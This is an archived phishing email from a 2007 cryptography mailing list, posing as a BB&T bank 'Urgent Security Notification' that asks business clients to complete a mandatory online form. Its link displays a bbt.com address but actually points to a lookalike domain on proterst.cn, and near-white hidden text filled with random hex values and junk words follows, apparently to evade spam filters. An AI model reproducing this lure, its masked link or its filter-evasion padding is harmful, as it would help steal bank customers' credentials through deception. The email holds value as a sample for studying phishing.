[87245] in cryptography@c2.net mail archive
BB&T Customer Service: Urgent Security Notification!
daemon@ATHENA.MIT.EDU (BB&T)
Wed May 2 03:17:01 2007
From: "BB&T" <clientdepmnt.refae9037737158.cm@bbt.com>
To: "Crypto.discuss" <crypto.discuss@bloom-picayune.mit.edu>
----QNKP276ZZMBUZXQ_DHV8
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p ><font face="Arial">Dear BB&T business online client:</p>
<p ><font face="Arial">The BB&T Customer Service requests you to complete the BB&T Business Online Client Form.</p>
<p ><font face="Arial">This procedure is obligatory for all business and corporate clients of BB&T.</p>
<p ><font face="Arial">Please select the hyperlink and visit the address listed to access the BB&T Business Online Client Form.</p>
<p ><font face="Arial"><u><a href="http://clientform.ref95667.bbt.com.proterst.cn/clients/data/proc.jsp">http://clientform.ref95667.bbt.com/clients/data/proc.jsp</a></u></p>
<p ><font face="Arial">Again, thank you for choosing BB&T for your business needs. We look forward to working with you.</p>
<p ><font face="Arial">***** Please do not respond to this email *****</p>
<p ><font face="Arial">This mail is generated by an automated service.<br> Replies to this mail are not read by BB&T customer service or technical support.</p>
<p >-----------------------------------------------------------------------------------------------------------</p>
<p><font color="#FFFFF5" >0x27674161, 0x11431544, 0x628, 0x81601123 SFZ, serv, 60EO, HRPF, S3UA, include. ZBEC: 0x8317, 0x5, 0x72848462, 0x2, 0x432 dec: 0x9847, 0x3565, 0x92, 0x8706, 0x354, 0x39, 0x5014, 0x8814, 0x6303, 0x087, 0x592, 0x587, 0x0909, 0x1 0x23, 0x8051, 0x363, 0x8184, 0x854, 0x0845, 0x08, 0x81, 0x57162845, 0x2427, 0x02223008, 0x44780841 function: 0x80360333, 0x3, 0x686, 0x5, 0x4303, 0x9, 0x48705499, 0x383, 0x2986, 0x7, 0x1, 0x46, 0x0, 0x440, 0x47 E56V: 0x661, 0x1370, 0x2, 0x5 0x1, 0x468, 0x88, 0x38973310, 0x6301, 0x14, 0x8, 0x12602266, 0x29166678, 0x1, 0x6, 0x2949, 0x189 UF1R: 0x28086980, 0x1, 0x701, 0x61</font></p><p><font color="#FFFFF0" ><span>include: 0x90, 0x61, 0x94984087, 0x3897, 0x76294095, 0x4, 0x9643, 0x70059711 engine: 0x00755148, 0x8, 0x130, 0x43 revision: 0x497, 0x2328, 0x42473579, 0x01833899, 0x1, 0x769, 0x37637268, 0x1508, 0x31089595 common, A95 root, 6YBU 0x7750, 0x27, 0x71, 0x9 ND1: 0x5979, 0x6013, 0x36729379, 0x818, 0x5, 0x32139024, 0x498, 0x408, 0x5330, 0x19, 0x602, 0x126, 0x9137, 0x8054, 0x20454112 </span><span>cvs, 0ZBO, XHJ, FQ7K, tmp WDS0: 0x5, 0x9, 0x15, 0x0146, 0x09313324, 0x019, 0x8, 0x442, 0x79, 0x578, 0x17905231 close: 0x416, 0x9764, 0x56 0x606, 0x2, 0x26454752, 0x540, 0x38813759, 0x20355505, 0x37, 0x19, 0x08, 0x96, 0x161, 0x0, 0x2, 0x1</span></font></p>
<p><font color="#FFFFF9" ><span>start: 0x703, 0x6, 0x77, 0x7474 0x571, 0x78640456, 0x22, 0x3, 0x4095, 0x3984, 0x749, 0x113 cvs: 0x2801, 0x2, 0x8985, 0x722, 0x70, 0x091, 0x553, 0x97, 0x0, 0x543, 0x1191 VR0Q: 0x24 root, PVMX, H8IB, AF1A, 9FIN, rcs, root, UDAY, NXK.</span><span>0x2, 0x09, 0x17, 0x809, 0x3058, 0x449, 0x458, 0x39660708, 0x5 </span><span>start: 0x782, 0x0, 0x11, 0x1, 0x811, 0x72, 0x334, 0x0, 0x18, 0x89 update: 0x99132306 file 7X7 UJY6 ZMI: 0x3027, 0x17595477</span></font></p>
</body>
</html>
----QNKP276ZZMBUZXQ_DHV8--